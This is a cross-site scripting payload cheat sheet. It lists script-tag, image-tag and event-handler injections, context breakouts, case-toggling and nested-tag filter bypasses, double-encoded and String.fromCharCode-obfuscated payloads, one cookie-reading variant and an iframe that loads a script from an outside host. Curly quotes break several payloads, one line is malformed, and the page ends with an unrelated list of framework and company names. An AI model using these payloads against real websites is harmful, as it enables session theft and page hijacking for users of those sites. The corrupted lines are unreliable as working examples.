Basic XSS codes:
———————————-
```<script>alert(“XSS”)</script>```
```<script>alert(“XSS”);</script>```
```<script>alert(‘XSS’)</script>```
“><script>alert(“XSS”)</script>
```<script>alert(/XSS”)</script>```
```<script>alert(/XSS/)</script>```
When inside Script tag:
———————————
```</script><script>alert(1)</script>```
```‘; alert(1);```
```‘)alert(1);//```
Bypassing with toggle case:
————————————–
```<ScRiPt>alert(1)</sCriPt>```
```<IMG SRC=jAVasCrIPt:alert(‘XSS’)>```
XSS in Image and HTML tags:
———————————————
```<IMG SRC=”javascript:alert(‘XSS’);”>```
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(‘XSS’)>
```<img src=xss onerror=alert(1)>```
```<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>```
```<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>```
```<IMG SRC=”jav ascript:alert(‘XSS’);”>```
```<IMG SRC=”jav	ascript:alert(‘XSS’);”>```
```<IMG SRC=javascript:alert('XSS')>```
```<IMG SRC=javascript:alert('XSS')>```
```<IMG SRC=javascript:alert('XSS')>```
```<BODY BACKGROUND=”javascript:alert(‘XSS’)”>```
```<BODY ONLOAD=alert(‘XSS’)>```
```<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>```
```<IMG SRC=”javascript:alert(‘XSS’)”```
<iframe src=http://ha.ckers.org/scriptlet.html <
Bypass the script tag filtering:
————————————————–
```<<SCRIPT>alert(“XSS”);//<</SCRIPT>```
```%253cscript%253ealert(1)%253c/script%253e```
```“><s”%2b”cript>alert(document.cookie)</script>```
```foo<script>alert(1)</script>```
```<scr<script>ipt>alert(1)</scr</script>ipt>```
Using String.fromCharCode function:
—————————————————–
```<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>```
```‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>```
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent